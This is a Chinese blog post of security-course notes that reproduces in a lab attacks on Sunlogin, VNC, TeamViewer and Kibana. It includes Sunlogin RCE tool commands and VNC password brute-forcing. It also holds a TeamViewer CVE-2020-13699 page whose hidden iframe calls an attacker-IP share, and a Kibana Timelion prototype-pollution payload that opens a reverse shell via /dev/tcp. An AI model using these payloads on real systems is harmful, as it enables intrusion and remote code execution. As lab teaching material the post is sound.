第58天-服务攻防-应用协议&设备 Kibana&Zabbix&远控向日葵&VNC&TV

已于 2024-02-07 11:47:27 修改
阅读量916 收藏 23
点赞数 25
分类专栏: 网络安全 文章标签: 安全 linux
于 2024-02-02 16:50:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52529261/article/details/135935221
版权

权当备忘记录,存在许多不完善,日后补坑(大概~)

视频链接: 

【小迪安全】红蓝对抗 | 网络攻防 | V2022全栈培训_哔哩哔哩_bilibiliicon-default.png?t=N7T8https://www.bilibili.com/video/BV1pQ4y1s7kH

相关工具:

链接:https://pan.baidu.com/s/1gEVS1iSMKMkrmE_WHTbH-g 
提取码:isok

一.知识点

1.远程控制-第三方应用安全

2.三方应用-向日葵&VNC&TV

3.设备平台-Zabbix&Kibana 漏洞

二.演示案例

1.远程控制-向日葵&Vnc&Teamviewer

2.设备平台-Zabbix-CVE-2022-23131

3.设备平台-Kibana-CVE-2019-7609

案例1:远程控制-向日葵&Vnc&Teamviewer

1.向日葵 CVE-2022-10270 远程代码执行漏洞

简介:向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。

影响版本:

        向日葵个人版:windows <=11.0.0.33

        向日葵简约版:<= v1.0.1.43315

下载好向日葵相关版本和exp,地址:https://github.com/Mr-xn/sunlogin_rce

确认在靶机安装好11.0.0.33826版本的向日葵

对靶机40000-60000之间的高位端口进行扫描,找到向日葵开启的存活可疑端口

xrkRce.exe -h ip -t scan

执行命令,可以看到靶机的敏感信息

xrkRce.exe -h ip -t rce -p port "command"

2.VNC 未授权访问漏洞

简介:VNC 全名Virtual Network Console(虚拟网络控制台),是基于 UNXI 和 Linux 的免费开源软件,由 VNC Server 和 VNC Viewer 两部分组成。默认端口号 5900。

靶机下载好VNC Server后,用kall进行端口扫描,可看到5900端口开放,vnc的信息也有显示

靶机打开VNC Server,若这里没设置身份验证的话,可以直接用VNC Viewer连接

VNC Viewer点击Connect

连接成功

若这里选择的是VNC password,会提示设置密码就没有用户名,若选择windows password,就需要靶机的用户和密码才能登录,前者可以使用hydra尝试爆破

设置VNC password

用字典尝试爆破,可以爆破出最后密码为123456abc

设置为Windows password,相当于得使用靶机用户名和密码才能登录

可以看到需要同时输入靶机用户名和密码才能登录

3.Teamviewer CVE-2020-13699

在本机新建一个html文件写入内容如下,启动phpstudy,将其放在phpstudy目录下让靶机可以访问。

<!DOCTYPE html>
<html>
<head>
 <title>cve-2020-13699</title>
</head>
<body>
 <p>Welcome to xiaodi!</p>
 <iframe style="height:1px;width:1px;" src='teamviewer10: --play \\attacker-IP\share\fake.tvs'></iframe>
</body>
</html>


//其中src='teamviewer10: --play \\attacker-IP\share\fake.tvs'为恶意构造的代码,可以修改自己想要的执行命令

靶机访问http://192.168.190.1/TeamViewer.html,点击“打开链接”会自动启动靶机的TeamViewer。

案例2:设备平台-Zabbix-CVE-2022-23131

1.Zabbix CVE-2022-23131 登录绕过漏洞复现

简介:Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。是一款服务器监控软件,其由 server、agent、web 等模块组成,其中 web 模块由 PHP 编写,用来显示数据库中的结果。默认端口:10051。

这个漏洞一般的靶场没有,搭建又非常的麻烦。需通过某些手段进行复现,在fofa找了几圈都是已修复的,这里就看下其他博客学习思路。

【漏洞复现】CVE-2022-23131 Zabbix SAML SSO认证绕过漏洞-CSDN博客icon-default.png?t=N7T8https://blog.csdn.net/weixin_46944519/article/details/123131257

案例3:设备平台-Kibana-CVE-2019-7609

1.Kibana CVE-2019-7609 远程代码执行漏洞

简介:Kibana 为 Elassticsearch 设计的一款开源的视图工具。其 5.6.15 和 6.6.1 之前的版本中存在一处原型链污染漏洞,利用漏洞可以在目标服务器上执行任意代码。默认端口:5601。

受影响版本:

        Kibana < 5.6.15 Kibana < 6.6.1  

打开vulhub的kibana,首先在kibana/CVE-2019-7609/目录下执行sysctl -w vm.max_map_count=262144命令,不然会出现Kibana server is not ready yet错误,之后执行docker-compose up -d启动容器,查看开放的端口为5601

访问url页面

kali进行端口监听

访问kibana,在Timelion模块输入shell,点击右边的三角形,反弹成功

//反弹shell
.es(*).props(label.proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/your-ip/your-ip-port 0>&1");process.exit()//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')


//其中your-ip和your-ip-port为需要反弹主机的ip和端口

三.总结 

此次涉及的内容为远程控制的第三方应用软件和一些设备平台,类似的利用思路都差不多。

易俫雫
关注
  • 25
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kibana7.7&&7.8winodws最新.rar
08-11
kibana7.7&&7.8winodws最新.rar
浅练ES入门&&工具Kibana&&head的使用&&IK分词器应用
Javashj的博客
08-26 866
例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。提示:以下是本篇文章正文内容,下面案例可供参考免费且开放的搜索:Elasticsearch、ELK 和 Kibana 的开发者 | Elastic如果要让分词器支持一些专有词语,可以自定义词库。iK分词器自带的main.dic的文件为扩展词典,stopword.dic为停用词典。先把这三个文件拿到Windows桌面,再进行修改xml文件,把另外两个文件名家后缀名加上即可。...
【小迪安全2023】第58:服务攻防-应用协议&设备Kibana&Zabbix&远控向日葵&VNC&TV
人若无名,便可专心练剑
04-26 1281
zabbix的漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。
elasticsearch-6.2.4.tar.gz&kibana;-6.2.4-linux-x86_64..tar.gz
03-11
包含elasticsearch-6.2.4.tar.gz 和 kibana-6.2.4-linux-x86_64..tar.gz
elasticsearch-6.2.4&kibana-6.2.4.zip
08-13
elasticsearch-6.2.4版本,包含ik分词。kibana-6.2.4-windows-x86_64。
es&&kibana异常.docx
09-20
Elasticsearch && Kibana 异常处理指南 Elasticsearch 是一个基于 Lucene 库的搜索和数据分析引擎,而 Kibana 是一个数据可视化平台,通常与 Elasticsearch 结合使用,以提供一个完整的数据分析解决方案。然而,在...
Docker中安装Elasticsearch&Kibana
01-07
安装之前先 百度 查看 ElasticSearch 和 Kibana 的对应关系,如果版本不对应可能会出现问题。 1、这里我安装 ElasticSearch:7.2.0 和 Kibana:7.2.0。 $ docker pull elasticsearch:7.2.0 敲完命令以后回车,等待...
数字时代网络安全服务的兴起
网络研究观
06-11 535
网络安全服务是一种通过基于云的服务来管理安全需求的综合方法。
如何确保数据跨域交换安全、合规、可追溯性?
文件数据安全交换
06-14 190
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 939
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
安全漏洞扫描工具
weixin_45639224的博客
06-05 583
安全漏洞扫描工具
蓝牙安全入门——两道CTF题目复现
weixin_66578482的博客
06-10 859
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF的题目可以复现一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春 题目 low_energy_crypto
操作系统安全:Windows系统安全配置,Windows安全基线检查加固
wangyuxiang946的博客
06-11 1158
Windows安全基线检查标准,Windows加固方式
Java中的安全管理器和权限控制
weixin_53840353的博客
06-13 484
Java安全管理器是一种允许应用程序在运行时检查对系统资源(如文件和网络)的访问权限的机制。通过定义和安装自定义的安全策略,程序员可以控制哪些代码能够执行特定的操作,从而保护系统资源的安全。@Override// 自定义安全策略throw new SecurityException("写文件操作被禁止!");try {// 尝试写文件操作System.err.println("安全异常:" + e.getMessage());在这个示例中,自定义的禁止所有文件写操作。
安鸾学院靶场——安全基础
qq_55202378的博客
06-13 675
后门端口,直接执行系统命令。注意:10021端口上ftp的后门端口为16200。添加完后,根据icon,可以看出这是一个python打包成的exe程序。看wp是由web.zip文件的,但是这里没有,所以搞不定了。下载提供的flag.zip和wordlist.txt,使用。:在vsftpd 2.3.4版本中,在登录输入用户名时输入。的返回包,可以拿到包含flag的txt文件。九阴真经上卷找不到,似乎被删了,只有下卷。类似于笑脸的符号,会导致服务处理开启。flag在whalwl数据库中。
Veeam Backup Enterprise Manager身份验证绕过漏洞(CVE-2024-29849)
lujiawei00的专栏
06-11 497
对于无法立即将 Veeam Backup Enterprise Manager 升级到 12.1.2.172 的客户,可执行以下缓解措施: 1.通过停止 Veeam Backup Enterprise Manager 软件来缓解该漏洞,可停止并禁用以下服务(禁用服务不会阻止安装 12.1.2 更新,但更新后需要将服务重置回自动启动):
Linux网络安全
十一、的博客
06-09 772
由于Linux系统的安全稳定,所以经常被用作网络应用服务器。但由于程序代码缺陷的难以避免,这些安装在Linux系统上的网络程序往往会存在着各种漏洞,而入侵者则是利用这些漏洞进行网络攻击,进入系统窃取数据、破坏系统或使系统无法提供正常服务等。Ping是基于ICMP协议的一个实用程序,用于验证两台计算机之间网络连接的可达性和质量。它通过发送ICMP回声请求消息到目标主机,并等待回声应答消息来判断网络状态。当执行ping命令时,它会生成一个ICMP回声请求数据包并发送到指定的目标主机。
如何保护云主机安全
最新发布
Canon_YK的博客
06-14 272
通过对访问权限和应用程序进行精确控制,可以减少对服务器的无效访问和恶意请求,降低服务器的负载,提高性能和稳定性。首先,建立完善的白名单管理制度和流程,明确白名单的添加、删除和修改等操作权限和流程,确保白名单的准确性和有效性。其次,加强对白名单技术的培训和宣传,提高员工的安全意识和技能水平,使其能够正确理解和使用白名单技术。深信达MCK主机加固系统是基于可信计算技术,锁定工作场景、实行严格场景白名单控制,受保护的主机只能做白名单规定的事情,任何白名单之外的、陌生程序都无法运行。
上心师傅的思路分享(三)--Nacos渗透
weixin_72543266的博客
06-10 971
Nacos 是阿里巴巴推出来的一个开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。但是Nacos是部署在内网的,因此下面通过语法搜索出来的可以看到的,一般会做访问限制的,正常是访问不到的,如果可以访问就可以尝试是否存在漏洞了.当然如果直接在真实环境下测试,一是未授权行为,二是不容易找到复现环境,所以在本地搭建环境来进行复现是最安全,也是最容易。
docker 已部署elasticsearch服务端口为9200的情况下 docker-compose 再部署 ELK7.4.2 详细版 kibana汉化
05-05
以下是在已经部署了Elasticsearch服务,端口为9200的情况下,使用docker-compose部署ELK7.4.2详细版并进行Kibana汉化的步骤: 1. 创建一个新的文件夹,命名为elk,用于存放docker-compose.yml文件和相关配置文件。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值